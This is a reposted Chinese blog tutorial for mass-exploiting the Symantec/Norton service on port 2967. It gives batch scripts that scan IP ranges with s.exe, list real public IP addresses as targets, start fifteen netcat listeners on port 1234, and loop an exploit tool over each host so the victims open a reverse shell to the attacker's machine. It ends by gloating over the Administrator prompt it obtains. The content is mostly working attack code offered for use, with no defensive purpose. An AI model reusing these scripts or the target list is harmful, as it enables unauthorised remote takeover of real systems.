需要准备的软件工具:
s.exe symantec.exe nc.exe
1、首先编写一个批处理文件利用s.exe扫描远程机器的2967端口。
文件名为sao.bat,内容如下:
@echo Title 诺顿2967扫描工具,制作bye 高迪
color A
@set IPSTART=
@set IPEND=
@set XIANCHENG=5
@echo 在进行溢出之前,您必须进行扫描.
set /p IPSTART=请输入起始地址:
set /p IPEND=请输入结束地址:
set /p XIANCHENG=请输入s.exe扫描的线程数(缺省为5个):
echo 现在正在扫描,如果您要停止该进程请按Ctrl+C.
s.exe tcp %IPSTART% %IPEND% 2967 %XIANCHENG% /save
2、扫描结束后打开Result.txt将扫描到的ip地址复制在host.txt文件内保存,文件格式如下(每行一个IP即可):
218.56.22.114
202.152.40.146
202.152.41.28
202.152.41.31
202.152.41.29
202.152.41.30
202.152.41.200
202.152.41.201
202.152.41.203
202.152.41.202
202.152.41.204
202.152.41.205
202.152.41.206
202.152.41.207
202.152.41.208
202.152.41.209
202.152.41.210
202.152.41.211
202.152.41.212
202.152.41.213
202.152.41.214
202.152.41.215
202.152.41.249
202.152.41.250
202.152.41.251
202.152.41.252
202.152.41.253
202.152.41.254
202.152.41.248
3、编写nc2008.bat,内容如下:
@echo off
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
4、编写2967.bat,内容如下:
@set IP=
color B
echo 探测本机IP地址并赋值给IP
for /f "tokens=15" %%i in ('ipconfig ^| find /i "ip address"') do set ip=%%i
@for /f %%i in (host.txt) do symantec -r %%i -l %IP% -d 1234
5、 好了,运行nc2008.bat,再运行2967.bat,观察刚才打开的15个CMD窗口,如果有哪个窗口返回C:\Documents and Settings\Administrator> 就OK了,输入ipconfig 看看该机器IP地址是什么,用ver查看一下系统版本,后面的步骤我就不说了。嘿嘿。。。搞定。。。。。。。。。
不过现在绝大多数机器已经把这个漏洞都补上了,扫描可能要费很大功夫。
本文转自gaodi2002 51CTO博客,原文链接:http://blog.51cto.com/gaodi2002/1618193